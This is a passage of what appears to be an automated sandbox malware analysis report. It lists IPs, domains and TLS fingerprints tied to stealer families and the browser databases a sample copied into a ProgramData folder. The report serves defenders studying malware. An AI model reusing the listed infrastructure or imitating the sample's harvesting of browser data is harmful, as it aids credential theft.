                                                                                                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                                                                      No simulations

                                                                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                                                                      IPs

                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      23.44.201.19file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                        invoice 700898 for wallcentre.com.shtmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          9d565bee-e6ce-1842-e729-b0df8f08ed34.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                            BraveBrowserSetup-BRV010.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              BraveBrowserSetup-BRV002.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                116.203.12.114file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                  Setup.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                    69633f.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                            T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.org/img/favicon.ico
                                                                                                                                                                                                                                                                              http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.org/
                                                                                                                                                                                                                                                                              http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                                                                                              http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.org/
                                                                                                                                                                                                                                                                              http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.org/
                                                                                                                                                                                                                                                                              http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.org/?setln=pl
                                                                                                                                                                                                                                                                              http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.org/
                                                                                                                                                                                                                                                                              http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • telegram.dog/
                                                                                                                                                                                                                                                                              LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                                                              • t.me/cinoshibot
                                                                                                                                                                                                                                                                              jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                                                              • t.me/cinoshibot

                                                                                                                                                                                                                                                                              Domains

                                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                              t.mefile.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              noll.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              Setup.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              69633f.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              njrtdhadawt.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              chrome.cloudflare-dns.cominvoice.docmGet hashmaliciousMetasploitBrowse
                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                              ep_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                              QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                              CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                              xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                              File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                              pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                              tasktow.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                                                                                                              QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 162.159.61.3
                                                                                                                                                                                                                                                                              ssl.bingadsedgeextension-prod-europe.azurewebsites.netfile.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              H3G7Xu6gih.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                                                                              urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                                                                                                                                                              • 94.245.104.56

                                                                                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                              TELEGRAMRUc9toH15OT0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                                              9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                                              PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                                              66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                                                                                                                              pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              HETZNER-ASDEfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                                                                              arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                                                              • 167.233.43.233
                                                                                                                                                                                                                                                                              x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                                                              • 5.9.64.77
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                              • 94.130.191.168
                                                                                                                                                                                                                                                                              t5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 213.239.239.164
                                                                                                                                                                                                                                                                              2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 168.119.31.126
                                                                                                                                                                                                                                                                              x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                              • 136.243.197.146
                                                                                                                                                                                                                                                                              sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                              • 5.9.225.47
                                                                                                                                                                                                                                                                              pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 94.130.191.168
                                                                                                                                                                                                                                                                              QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 94.130.191.168
                                                                                                                                                                                                                                                                              AKAMAI-ASN1EU8ZVMneG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                              • 172.234.241.24
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                                              https://whtt.termlicari.ru/HnkNbg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 2.16.168.119
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                              • 184.51.149.224
                                                                                                                                                                                                                                                                              x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                              • 23.13.125.21
                                                                                                                                                                                                                                                                              QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                              • 2.16.158.73
                                                                                                                                                                                                                                                                              pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 23.219.82.40
                                                                                                                                                                                                                                                                              QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              • 23.44.203.15
                                                                                                                                                                                                                                                                              R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 23.44.203.84

                                                                                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19FinTP-Update.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              hrupdate.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              hrupdate.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              billys.exeGet hashmaliciousMeduza StealerBrowse
                                                                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              ruppert.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              2JSGOlbNym.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              4hSuRTwnWJ.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                                                                              • 149.154.167.99
                                                                                                                                                                                                                                                                              QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                                                                                              • 149.154.167.99

                                                                                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                                                                              C:\ProgramData\Z5PPP8Q1NYCB\0ZC2DB

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):98304
                                                                                                                                                                                                                                                                              Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\ProgramData\Z5PPP8Q1NYCB\479RQ1

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                                                                                                              Entropy (8bit):4.698999446679606
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
                                                                                                                                                                                                                                                                              MD5:73351F70BFEF33BEEA9E1CC192801D02
                                                                                                                                                                                                                                                                              SHA1:ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
                                                                                                                                                                                                                                                                              SHA-256:F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
                                                                                                                                                                                                                                                                              SHA-512:56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ

                                                                                                                                                                                                                                                                              C:\ProgramData\Z5PPP8Q1NYCB\68Q1DJ

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):196608
                                                                                                                                                                                                                                                                              Entropy (8bit):1.265412664866743
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:KrJ/2qOB1nxCkMWSAELyKOMq+8HKkjucswRv8p3nVum8:K0q+n0JW9ELyKOMq+8HKkjuczRv894
                                                                                                                                                                                                                                                                              MD5:82F001CC76E2292FDE843BBEB1818D50
                                                                                                                                                                                                                                                                              SHA1:CC7726E0FF5759FA7ADD298DEFB2E92AB2119E2A
                                                                                                                                                                                                                                                                              SHA-256:5EC2B9101FCC9046C56BD9ADC05811E2367F98DFE3652132B65F37B80EEBBAD4
                                                                                                                                                                                                                                                                              SHA-512:AF1A9468FE607FE703BFBF31F58C3A949F43BC08D477F855227B186881E7EA60403DA345B6DD44E2D6D08C961B6CABD8609BD6D6E8141F647F1EDA449C72E63E
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\ProgramData\Z5PPP8Q1NYCB\BA168G

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1769), with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):9370
                                                                                                                                                                                                                                                                              Entropy (8bit):5.514140640374404
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:lLnSRkPYbBp6tqUCaXr6V6kHNBw8D3nSl:NeqqUWpPwK0
                                                                                                                                                                                                                                                                              MD5:7E44458E0A8A3A7D10875BC3B7AE72D1
                                                                                                                                                                                                                                                                              SHA1:E5E6AC8676EE3761DAB13A10EB7573C19F48D297
                                                                                                                                                                                                                                                                              SHA-256:21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
                                                                                                                                                                                                                                                                              SHA-512:012ED6CDC0802AA1063EFE841549341CC86EB626A26FC4BDC509598D8E33093296510344A2CC4419B007F6191F3445DA8F0AAE3B1626E54C1EF66DDDF3FA59B1
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                              C:\ProgramData\Z5PPP8Q1NYCB\C2DBS2

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                                                                                                              Entropy (8bit):4.698999446679606
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
                                                                                                                                                                                                                                                                              MD5:73351F70BFEF33BEEA9E1CC192801D02
                                                                                                                                                                                                                                                                              SHA1:ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
                                                                                                                                                                                                                                                                              SHA-256:F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
                                                                                                                                                                                                                                                                              SHA-512:56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ

                                                                                                                                                                                                                                                                              C:\ProgramData\Z5PPP8Q1NYCB\J5PP8Q9ZU

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
